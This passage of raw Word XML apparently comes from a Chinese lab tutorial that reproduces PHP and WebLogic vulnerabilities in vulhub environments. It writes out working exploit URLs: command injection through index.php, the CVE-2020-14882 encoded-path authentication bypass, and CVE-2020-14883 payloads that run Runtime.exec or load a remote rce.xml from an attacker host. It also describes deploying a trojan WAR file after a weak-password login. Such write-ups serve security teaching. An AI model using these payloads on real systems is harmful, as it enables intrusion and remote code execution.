          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE8F49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损坏导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>PATH_INFO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">为空，从而触发该漏洞。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFB85D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受影响版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>版本 、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP 7.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>版本 、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP 7.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>版本 、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP 7.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4A6C2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漏洞复现：vulhub靶场启动环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35243FA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访问靶场看效果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AABC76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该漏洞也是直接使用该漏洞的利用工具来检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0EC34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然后访问携带指令的网址即可执行指令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4065EEA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hyperlink r:id="rId119" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://192.168.1.9:8080/index.php?a=id</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21816C8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320990F8" wp14:editId="340B5A74">
            <wp:extent cx="5972810" cy="1321435"/>
            <wp:effectExtent l="0" t="0" r="1270" b="4445"/>
            <wp:docPr id="1379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" name="图片 6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DA4E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hyperlink r:id="rId121" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://192.168.1.9:8080/index.php?a=whoami</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B1B0EC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3299DE3F" wp14:editId="53EFE303">
            <wp:extent cx="5973445" cy="1245235"/>
            <wp:effectExtent l="0" t="0" r="635" b="4445"/>
            <wp:docPr id="1380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图片 62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97D4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</w:p>
    <w:p w14:paraId="62B4732F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</w:p>
    <w:p w14:paraId="3FB3C3BE" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:spacing w:before="100" w:line="0" w:lineRule="atLeast"/>
        <w:outlineLvl w:val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八、应用服务器漏洞之weblogic漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E69188D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 xml:space="preserve">8.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE-2020-14882</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>权限验证绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DFD2D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原理：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>通过构造特定的URL，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>让未授权的用户绕过管理控制台权限验证，访问后台系统。不过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A807B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的是低权限用户，该账户无法安装新应用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，也</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>直接执行任意代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3D35F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测试权限绕过漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694B7AC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访问如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>即可未授权访问管理后台：访问失败就清空缓存多访问几次</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB1F36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hyperlink r:id="rId123" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://192.168.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>:7001/console/css/%252e%252e%252fconsole.portal</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="38D4228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访问后台后，我们发现是低权限用户，无法直接执行任意代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3D093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此时需要利用第二个漏洞(CVE-2020-14883)，两种利用方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6996F544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 xml:space="preserve">8.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE-2020-14883</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>任意命令执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4C28B0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利用此漏洞允许后台任意用户通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>协议执行任意命令。用这两个漏洞组成的利用链，可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C1D2D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通过一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>请求在远程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Weblogic </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器上以未授权的任意用户身份执行命令。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C3237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漏洞利用方法1：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2634EC3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通过类：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>com.tangosol.coherence.mvel2.sh.ShellSession</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5755EAB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直接访问如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，即可利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>com.tangosol.coherence.mvel2.sh.ShellSession</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">执行命令： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161A634C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http://192.168.1.9:7001/console/css/%252e%252e%252fconsole.portal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>?_nfpb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6014E8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/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>=true&amp;_pageLabel=&amp;handle=com.tangosol.coherence.mvel2.sh.ShellSession</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0EC7E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/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64177E3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 w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>漏洞利用方法2：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7451347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通过类：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>com.bea.core.repackaged.springframework.context.support.FileSystemX mlApplic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A57373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ationContext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEEF00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在自己的站点上构造一个XML文件，代码poc网上有。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7A563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然后通过如下URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>即可让</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Weblogic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>加载此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件并执行其中的命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33496AFF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/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>http://192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>:7001/console/css/%252e%252e%252fconsole.portal?_nfpb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229A8045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/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>=true&amp;_pageLabel=&amp;handle=com.bea.core.repackaged.springframework.context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C37A36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Style w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>support.FileSystemXmlApplicationContext("http://192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">/rce.xml") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D851D3C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color w:val="808080" w:themeColor="background1" w:themeShade="8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color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8.3 Weblogic弱口令漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BF46B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漏洞说明：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>eblogic后台管理系统登录用户名和密码一般都有一些默认值，不限版本，如果没有</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43088BA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修改密码的话会出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>现弱口令漏洞，可以百度查看常见的用户名和密码组合。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E1A5AF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漏洞复现：使用vulhub靶场打开漏洞容器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209E10A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1、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>网址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http://192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:7001/console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF0B31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会自动跳转到登录页面：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http://192.168.0.27:7001/console/login/LoginForm.jsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F13B24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2、使用weblogic常用用户名和密码进行尝试登录后台，登录成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AB32B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3、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>正常渗透测试到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>到此即可上报</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>若</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>想控制服务器，可在后台系统部署项目位置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>木马</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC5B062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漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0C7CE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上传部署jobfan.war木马文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601FEFC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直接用网站和War包里木马文件名访问：192.168.1.9:7001/jobfan/2010.jsp——利用成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443E5A91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color w:val="808080" w:themeColor="background1" w:themeShade="8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color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8.4 Weblogic未授权远程代码执行漏洞(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CVE-2023-21839)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27254C23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漏洞说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE69DED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CVE-2023-21839漏洞允许未授权的远程用户通过IIOP/T3协议执行JNDI lookup查找操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1645645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在JDK版本较低或系统中存在javaSerializedData 工具的情况下，这可能导致远程代码执行RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F263B6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漏洞。由于Weblogic的t3/iiop协议支持远程对象绑定到服务端并可通过lookup查询。当远程对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C1152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象是基于OpaqueReference是，查询这些对象时，服务端会调用其getReferent方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2254C758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在weblogic.deployment.jms.ForeignOpaqueReference类中，实现了getReferent方法，并</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2970368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使用了context.lookup(this.remoteJNDIName)进行对象查询。 因此攻击者可以利用rmi/ldap远</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E90F1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程协议执行远程命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F5DA9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影响版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle Weblogic Server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>12.2.1.3.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
